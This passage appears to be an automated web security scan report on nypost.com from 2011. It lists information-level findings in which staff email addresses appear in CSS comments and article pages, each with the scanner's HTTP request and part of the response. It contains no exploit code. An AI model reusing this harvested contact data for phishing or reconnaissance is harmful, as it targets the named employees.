* @param    Liste d'objet (document.form.select) recu du formulaire.
*            Ex; if ( deleteAllOptionSelect( document.form.select1, document.form.select2 ) ) { ...
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function deleteAllOptionSelect() {
   var i;

   for ( var i = 0; i < deleteAllOptionSelect.arguments.length; i++ ){
       thisSelect = deleteAllOptionSelect.arguments[i];

       for ( j = thisSelect.
...[SNIP]...
t
* "".
*
* @param    Liste d'objet (document.form.select) recu du formulaire.
*            Ex; if ( deleteEmptySelect( document.form.select1, document.form.select2 ) ) { ...
*
* @author Luc Rivet - luc.rivet@cognicase.com
*/
function deleteEmptySelect() {
   var i;

   for ( var i = 0; i < deleteEmptySelect.arguments.length; i++ ){
       thisSelect = deleteEmptySelect.arguments[i];
       //enlever les blancs
       for ( j = t
...[SNIP]...
0; j-- ) {
           if ( thisSelect.options[j].value == "" ) {
               thisSelect.options[j] = null;
           }
       }
   }
}

/**
* Opens a new customized window with a specified URL
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function openWin(url, width, height) {
   var winName; // New window name
   var params; // Defines the new window parameters
   var winObj; // New window object

   winName = "content";

   para
...[SNIP]...

               let++;
       }        
   }    

   if (txt.length!=8 || let==0 || dgt==0 || oth>0 ) {
       return false;            
   }
   
   return true;
}

/**
* Pop up the browser print window
*
* @author Houssam Fawaz - houssam.fawaz@cognicase.com
*/
function printWindow() {
   window.print();
}

/**
*Copyright Microsoft (C)
**/
var Page_IsValid = true;
var Page_BlockSubmit = false;

function ValidatorUpdateDisplay(val) {
if
...[SNIP]...

10.6. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_gallery/video_list/video_list.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_gallery/video_list/video_list.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_gallery/video_list/video_list.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 17 Nov 2009 19:53:28 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1261
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:22:52 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */
.video_list{
   width:835px;
   margin-left:5px;
   margin-top:5px;
   background:#212121;
   padding:10px 10px;
   position:relative;
}
.video_list ul#video_menu{
   list-style:none;
   border-bottom:1
...[SNIP]...

10.7. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 10 Nov 2009 17:22:09 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1514
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:53 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

/*columnists block*/
.columnists_block{
border-bottom:none;
}

.columnists_block ul, .columnists_block h4, .columnists_block h3{
margin:0; padding:0;
}
.columnists_block li{
list-
...[SNIP]...

10.8. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_pagesix/css/pagesix.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_pagesix/css/pagesix.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_pagesix/css/pagesix.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/pagesix
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.4.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=4; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 31 Aug 2011 18:20:35 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1133
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:24:41 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author : tmoussignac@nypost.com */

.pagesix_page #content_wrap #double_wide_region{
   background:none;
   position:relative;
   color:#fff;
}
#pagesix #content_wrap{
   background:url(/rw/SysConfig/WebPortal/nypost/blocks/_pagesix/images/
...[SNIP]...

10.9. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_pagesix/pagesix_logo/pagesix_logo.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_pagesix/pagesix_logo/pagesix_logo.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_pagesix/pagesix_logo/pagesix_logo.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/pagesix
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.4.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=4; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 31 Aug 2011 20:59:42 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1308
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:24:41 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

#pagesix_logo{
   background:url(/rw/SysConfig/WebPortal/nypost/blocks/_pagesix/images/pagesix_logo.png) center top no-repeat;
   width:155px; height:200px;
   position:absolute;
   left:0;
   top:0;
...[SNIP]...

10.10. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_pagesix/top_story/top_story.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_pagesix/top_story/top_story.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_pagesix/top_story/top_story.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/pagesix
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.4.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=4; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 22 Feb 2010 15:31:57 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 5509
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:24:41 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

/*generic styles*/
.pagesix_top_story{
   width:440px;
   height:300px;
   margin-left:210px;
   position:relative;
}
.pagesix_top_story ul{
   list-style:none;
}
.pagesix_top_story ul li{
   mar
...[SNIP]...

10.11. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 22 Mar 2011 17:46:57 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 5452
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:53 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

.widget{
   width:300px;
   position:relative;
   margin-top:10px;
}
.widget .widget_head,
.widget .widget_body,
.widget .widget_foot,
.widget .widget_clip_head,
.widget .widget_clip_foot,
...[SNIP]...

10.12. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 12 Aug 2009 14:56:21 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1128
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:53 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/*Author : tmoussignac@nypost.com*/

.block_links_wrap{
   width:100%;
   height:20px;
   position:relative;
}
.block_links_wrap .blk_lt, .block_links_wrap .blk_rt{
   height:20px;
   width:10px;
   position:absolute;
   background:url(/
...[SNIP]...

10.13. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 15 Oct 2009 19:49:05 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1366
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:53 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

/*Homepage markets blocks*/
#markets_blocks{
margin-right:7px;
position:relative;
z-index:1;
border-top:1px solid #ccc;
padding-top:10px;
}
.market_data{
   width:100%;
   borde
...[SNIP]...

10.14. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 11 May 2010 13:57:45 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 3971
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:53 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

/*Reader's Poll*/
.poll{
margin-left:5px;
}
.poll blockquote{
width:86.2%;
font: bold 21px 'Arial Black', Helvetica, sans-serif;
letter-spacing:-0.5px;
line-height:20px;
text-align:cen
...[SNIP]...

10.15. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 10 Feb 2011 22:26:23 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2184
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:53 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

#rt_rail #post_pics_block .rounded_foot h4{
   margin:0; padding:0;
   position:absolute;
   left:10px; top:10px;
   font:italic bold 18px arial;
   letter-spacing:-1px;
   color:#000;
   text-shadow:1px 2px 2p
...[SNIP]...

10.16. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 26 Aug 2010 17:44:57 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 7637
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:53 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

/* section default blocks*/

.block.three_cols{
width:470px;
}
.block.two_cols{
width:440px;
}
.block .btn{
position: absolute;
bottom: -1px;
right: -3px;
}
.block .sponsored {
   height
...[SNIP]...

10.17. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 23 Sep 2009 20:01:30 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 6843
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:53 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

#content_wrap .ct_top_story{
width: 484px;
border-right: 1px solid #999;
border-left: 1px solid #999;
padding-left: 4px;
padding-bottom: 15px;
background: #fff;
}

#top_story_wrap.bloc
...[SNIP]...

10.18. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_wide.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_wide.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_wide.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 02 Oct 2009 17:46:14 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 847
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:22:52 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

#top_story_def{
   width:650px;
   background-image:url(/rw/SysConfig/WebPortal/nypost/blocks/top_story/images/top_story_def_back_wide.png);
}
#top_story_def .top_story_data{
   width:650px;
   he
...[SNIP]...

10.19. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/home_default.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/css/home_default.css

Issue detail

The following email address was disclosed in the response:

Request

GET /Resource/SysConfig/WebPortal/nypost/css/home_default.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1459067327.1315773955.1315773955.1315773955.1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 19 Aug 2009 16:17:34 GMT
Content-Type: text/css;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1235
Cache-Control: must-revalidate, max-age=86400
Date: Tue, 27 Sep 2011 13:20:53 GMT
Connection: close

@charset "utf-8";
/* CSS Document */
/* Author: tmoussignac@nypost.com */

#content_wrap{
   width:968px;
   background:#eee;
   margin-top:20px;
   border:1px solid #999;
   min-height: 100px;
}
#content_wrap .lt_rail, #content_wrap .ct_rail{
   float:left;
}
#content_wrap .lt_rail
...[SNIP]...

10.20. http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J

Issue detail

The following email address was disclosed in the response:

Request

GET /p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; _chartbeat2=rdx0wt5nps41a8fh.1315773978848; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.3.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
ETag: 66562fb2-1d30-402e-8dc5-09c5f4a9f7d6
Vary: Accept-Encoding
Cache-Control: max-age=20
Date: Tue, 27 Sep 2011 13:23:29 GMT
Content-Length: 67519
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
<a target="_self" href="mailto:kate.sheehy@nypost.com">kate.sheehy@nypost.com</a>
...[SNIP]...

10.21. http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN

Issue detail

The following email address was disclosed in the response:

Request

GET /p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nypost.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.1.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=1; _chartbeat2=rdx0wt5nps41a8fh.1315773978848

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
ETag: a000d3d0-a229-4254-bb15-2bddd605cc7f
Vary: Accept-Encoding
Cache-Control: max-age=2
Date: Tue, 27 Sep 2011 13:22:51 GMT
Content-Length: 69364
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.
...[SNIP]...
<a target="_self" href="mailto:salgar@nypost.com">salgar@nypost.com</a>
...[SNIP]...

10.22. http://www.nypost.com/pagesix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /pagesix

Issue detail

The following email addresses were disclosed in the response:

Request

GET /pagesix HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
